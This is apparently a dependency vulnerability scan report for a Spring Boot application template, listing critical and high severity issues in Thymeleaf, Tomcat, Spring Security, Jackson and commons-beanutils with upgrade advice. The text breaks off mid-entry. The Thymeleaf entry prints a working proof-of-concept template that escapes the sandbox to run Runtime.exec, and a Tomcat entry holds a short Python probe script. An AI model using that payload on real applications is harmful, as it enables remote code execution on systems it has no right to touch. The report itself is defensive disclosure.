Vulnerabilities

104 via 3881 paths

Dependencies

176

Source

GitHub

Commit

097a10e6

Find, fix and prevent vulnerabilities in your code.

Issue type
  • 104
  • 11
Severity
  • 8
  • 38
  • 57
  • 12
Status
  • 115
  • 0
  • 0

critical severity

Sandbox Bypass

  • Vulnerable module: org.thymeleaf:thymeleaf
  • Introduced through: nz.net.ultraq.thymeleaf:thymeleaf-layout-dialect@3.0.0 and org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b nz.net.ultraq.thymeleaf:thymeleaf-layout-dialect@3.0.0 org.thymeleaf:thymeleaf@3.0.15.RELEASE
    Remediation: Upgrade to nz.net.ultraq.thymeleaf:thymeleaf-layout-dialect@3.3.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b nz.net.ultraq.thymeleaf:thymeleaf-layout-dialect@3.0.0 nz.net.ultraq.thymeleaf:thymeleaf-expression-processor@3.0.0 org.thymeleaf:thymeleaf@3.0.15.RELEASE
    Remediation: Upgrade to nz.net.ultraq.thymeleaf:thymeleaf-layout-dialect@3.3.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.thymeleaf.extras:thymeleaf-extras-java8time@3.0.4.RELEASE org.thymeleaf:thymeleaf@3.0.15.RELEASE
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.thymeleaf:thymeleaf-spring5@3.0.15.RELEASE org.thymeleaf:thymeleaf@3.0.15.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.0.0.

Overview

Affected versions of this package are vulnerable to Sandbox Bypass due to insufficient checks, by allowing an attacker to execute arbitrary code via a crafted HTML.

PoC

<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
</head>
<body>

<tr
        th:with="getRuntimeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'getRuntime' )}"
>
    <td>
        <a
                th:with="runtimeObj=${T(org.springframework.util.ReflectionUtils).invokeMethod(getRuntimeMethod, null)}"
        >
            <a
                    th:with="exeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'exec', ''.getClass() )}"
            >
                <a
                        th:with="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(exeMethod, runtimeObj, 'calc' )
                }"
                        th:href="${param2}"
                ></a>
            </a>

        </a>
    </td>
</tr>

</body>
</html>

Remediation

Upgrade org.thymeleaf:thymeleaf to version 3.1.2.RELEASE or higher.

References

critical severity

Time-of-check Time-of-use (TOCTOU) Race Condition

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.7.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Time-of-check Time-of-use (TOCTOU) Race Condition. On case insensitive file systems, when the default servlet is write-enabled, an attacker can upload a malicious file containing executable code and bypass case sensitivity checks, causing it to be treated as a JSP and executed.

This vector has been observed when the application is under load and read and upload operations are performed on the same file simultaneously.

Note:

The default readonly initialization parameter value of true is not vulnerable.

This is related to CVE-2024-56337 where additional configurations are defined to fully mitigate this issue as upgrading to the fixed version doesn't fully mitigate this vulnerability;

In addition to upgrading to the fixed version, users are advised to apply the following mitigations, depending on which version of Java they are using with Tomcat :

  1. running on Java 8 or Java 11: the system property sun.io.useCanonCaches must be explicitly set to false (it defaults to true)

  2. running on Java 17: the system property sun.io.useCanonCaches, if set, must be set to false (it defaults to false)

  3. running on Java 21 onwards: no further configuration is required (the system property and the problematic cache have been removed)

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.98, 10.1.34, 11.0.2 or higher.

References

critical severity

Time-of-check Time-of-use (TOCTOU) Race Condition

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.7.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Time-of-check Time-of-use (TOCTOU) Race Condition due to imcomplete mitigation advice associated with CVE-2024-50379 in the file-handling process with servlet write enabled.

In addition to upgrading to the fixed version, users are advised to apply the following mitigations, depending on which version of Java they are using with Tomcat :

  1. running on Java 8 or Java 11: the system property sun.io.useCanonCaches must be explicitly set to false (it defaults to true)

  2. running on Java 17: the system property sun.io.useCanonCaches, if set, must be set to false (it defaults to false)

  3. running on Java 21 onwards: no further configuration is required (the system property and the problematic cache have been removed)

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.98, 10.1.34, 11.0.2 or higher.

References

critical severity

Uncaught Exception

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Uncaught Exception due to the custom Jakarta Authentication ServerAuthContext component which may throw an exception during the authentication process without setting an HTTP status to indicate failure. An attacker can gain unauthorized access by exploiting this unchecked error condition.

Note:

This is only exploitable if Tomcat is configured to use a custom Jakarta Authentication ServerAuthContext component that behaves in this way. According to the maintainers, no such cases are known.

PoC

import requests

# Target server configuration
TARGET_URL = "http://example.com/login"  # Replace with your target's authentication URL
TEST_HEADERS = {
    "Content-Type": "application/json"
}
TEST_PAYLOAD = {
    "username": "test_user",  # Sample username
    "password": "invalid_password"  # Invalid password for testing
}

def check_cve_2024_52316(target_url):
    """
    Test for CVE-2024-52316 vulnerability by sending crafted authentication requests.

    Args:
        target_url (str): The URL of the authentication endpoint to test.
    """
    try:
        print(f"[*] Sending test request to {target_url}")
        # Send a POST request with the test payload
        response = requests.post(target_url, json=TEST_PAYLOAD, headers=TEST_HEADERS, timeout=5)
        
        # Analyze the server's response
        if response.status_code in [401, 403]:
            print(f"[SAFE] The server returned an expected HTTP status code: {response.status_code}")
        elif response.status_code == 200:
            print(f"[VULNERABLE] Potential CVE-2024-52316 detected! Server returned status code: {response.status_code}")
        else:
            print(f"[INFO] Unexpected HTTP status code: {response.status_code}")
            print("Response content:", response.text)
    except requests.exceptions.RequestException as e:
        print(f"[ERROR] Failed to connect to the target: {e}")

if __name__ == "__main__":
    print("[START] CVE-2024-52316 Detection Script")
    check_cve_2024_52316(TARGET_URL)

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.96, 10.1.31, 11.0.0 or higher.

References

critical severity

Improper Access Control

  • Vulnerable module: org.springframework:spring-webmvc
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.10.

Overview

org.springframework:spring-webmvc is a package that provides Model-View-Controller (MVC) architecture and ready components that can be used to develop flexible and loosely coupled web applications.

Affected versions of this package are vulnerable to Improper Access Control when using an un-prefixed double wildcard pattern ("**") in the Spring Security configuration with the mvcRequestMatcher. This configuration creates a pattern-matching discrepancy between Spring Security and Spring MVC, potentially allowing unauthorized access.

Note: The Spring security team have published information about an existing PoC, but have not shared the PoC itself publicly, therefore we don't currently have the ability to verify it.

Remediation

Upgrade org.springframework:spring-webmvc to version 5.3.26, 6.0.7 or higher.

References

critical severity

Access Control Bypass

  • Vulnerable module: org.springframework.security:spring-security-config
  • Introduced through: org.springframework.boot:spring-boot-starter-security@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.14.

Overview

org.springframework.security:spring-security-config is a security configuration package for Spring Framework.

Affected versions of this package are vulnerable to Access Control Bypass. When using ** as a pattern in Spring Security configuration for WebFlux a mismatch in pattern matching is created between Spring Security and Spring WebFlux, resulting in a security bypass.

Note:

The fixed versions require Spring Framework versions:

  1. 6.0.11+

  2. 5.3.29+

  3. 5.2.25+

Note: The Spring security team have published information about an existing PoC, but have not shared the PoC itself publicly, therefore we don't currently have the ability to verify it.

Remediation

Upgrade org.springframework.security:spring-security-config to version 5.6.12, 5.7.10, 5.8.5, 6.0.5, 6.1.2 or higher.

References

critical severity

Missing Authorization

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.boot:spring-boot-starter-security@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Missing Authorization allowing Spring Security authorization rules to be bypassed for static resources.

Note:

Non-Static Resources Are Not Affected by this vulnerability. This is because handlers for these routes use predicates to validate the requests even if all security filters are bypassed.

Spring Security states that for this to impact an application, all of the following conditions must be met:

  1. It must be a WebFlux application.

  2. It must be using Spring's static resources support.

  3. It must have a non-permitAll authorization rule applied to the static resources support.

Remediation

Upgrade org.springframework.security:spring-security-web to version 5.7.13, 5.8.15, 6.2.7, 6.3.4 or higher.

References

critical severity

Authentication Bypass by Primary Weakness

  • Vulnerable module: org.springframework.security:spring-security-crypto
  • Introduced through: org.springframework.boot:spring-boot-starter-security@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework.security:spring-security-crypto@5.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.3.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework.security:spring-security-crypto@5.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.3.10.

Overview

org.springframework.security:spring-security-crypto is a spring-security-crypto library for Spring Security.

Affected versions of this package are vulnerable to Authentication Bypass by Primary Weakness in the BCryptPasswordEncoder.matches() function, which only takes the first 72 characters for comparison. Passwords longer than this will incorrectly return true when compared against other strings sharing the same first 72 characters, making them easier to brute force.

Note: Patches have also been issued for older versions of Enterprise Support packages.

Remediation

Upgrade org.springframework.security:spring-security-crypto to version 6.3.8, 6.4.4 or higher.

References

high severity

Race Condition

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Race Condition on connection close when using the APR/Native connector. An attacker could trigger a JVM crash by rapidly opening and closing HTTP/2 connections. The likelihood of hitting the race condition increases if the connections are closed from the client side.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.107 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: com.fasterxml.jackson.core:jackson-core
  • Introduced through: com.fasterxml.jackson.core:jackson-core@2.13.1, com.fasterxml.jackson.core:jackson-databind@2.13.1 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.15.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.fasterxml.jackson.core:jackson-databind@2.13.1 com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.15.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to net.sf.jasperreports:jasperreports@6.21.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 com.fasterxml.jackson.core:jackson-databind@2.13.1 com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.jsonwebtoken:jjwt-jackson@0.11.2 com.fasterxml.jackson.core:jackson-databind@2.13.1 com.fasterxml.jackson.core:jackson-core@2.13.1
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.fasterxml.jackson.core:jackson-databind@2.13.1 com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to net.sf.jasperreports:jasperreports@6.21.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 com.fasterxml.jackson.core:jackson-core@2.13.1
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 com.fasterxml.jackson.core:jackson-databind@2.13.1 com.fasterxml.jackson.core:jackson-core@2.13.1
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 com.fasterxml.jackson.core:jackson-databind@2.13.1 com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.1.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 com.fasterxml.jackson.core:jackson-databind@2.13.1 com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.0.

Overview

com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation

Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing input size validation when performing numeric type conversions. A remote attacker can exploit this vulnerability by causing the application to deserialize data containing certain numeric types with large values, causing the application to exhaust all available resources.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.core:jackson-core to version 2.15.0-rc1 or higher.

References

high severity

Stack-based Buffer Overflow

  • Vulnerable module: com.fasterxml.jackson.core:jackson-core
  • Introduced through: com.fasterxml.jackson.core:jackson-core@2.13.1, com.fasterxml.jackson.core:jackson-databind@2.13.1 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.15.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.fasterxml.jackson.core:jackson-databind@2.13.1 com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.15.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to net.sf.jasperreports:jasperreports@6.21.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 com.fasterxml.jackson.core:jackson-databind@2.13.1 com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.jsonwebtoken:jjwt-jackson@0.11.2 com.fasterxml.jackson.core:jackson-databind@2.13.1 com.fasterxml.jackson.core:jackson-core@2.13.1
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.fasterxml.jackson.core:jackson-databind@2.13.1 com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to net.sf.jasperreports:jasperreports@6.21.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 com.fasterxml.jackson.core:jackson-core@2.13.1
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 com.fasterxml.jackson.core:jackson-databind@2.13.1 com.fasterxml.jackson.core:jackson-core@2.13.1
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 com.fasterxml.jackson.core:jackson-databind@2.13.1 com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.1.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 com.fasterxml.jackson.core:jackson-databind@2.13.1 com.fasterxml.jackson.core:jackson-core@2.13.1
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.0.

Overview

com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation

Affected versions of this package are vulnerable to Stack-based Buffer Overflow due to the parse process, which accepts an unlimited input file with deeply nested data. An attacker can cause a stack overflow and crash the application by providing input files with excessively deep nesting.

Remediation

Upgrade com.fasterxml.jackson.core:jackson-core to version 2.15.0-rc1 or higher.

References

high severity

Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')

  • Vulnerable module: commons-beanutils:commons-beanutils
  • Introduced through: net.sf.jasperreports:jasperreports@6.19.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 commons-beanutils:commons-beanutils@1.9.4
    Remediation: Upgrade to net.sf.jasperreports:jasperreports@6.21.5.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 commons-digester:commons-digester@2.1 commons-beanutils:commons-beanutils@1.9.4

Overview

commons-beanutils:commons-beanutils is a provides an easy-to-use but flexible wrapper around reflection and introspection.

Affected versions of this package are vulnerable to Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') via the getProperty and getNestedProperty methods of the PropertyUtilsBean class. An attacker can execute arbitrary code by accessing the declaredClass property of Java enum objects, which allows access to the ClassLoader.

Note:

The BeanIntrospector class that can mitigate this vulnerability was added in version 1.9.2 but its usage was not enabled by default.

Remediation

Upgrade commons-beanutils:commons-beanutils to version 1.11.0 or higher.

References

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.13.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.13.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to the uniform handling of request parameters and parts in multipart requests. An attacker can craft a malicious request with a large number of parts, which can lead to a Denial of Service.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.106, 10.1.42, 11.0.8 or higher.

References

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
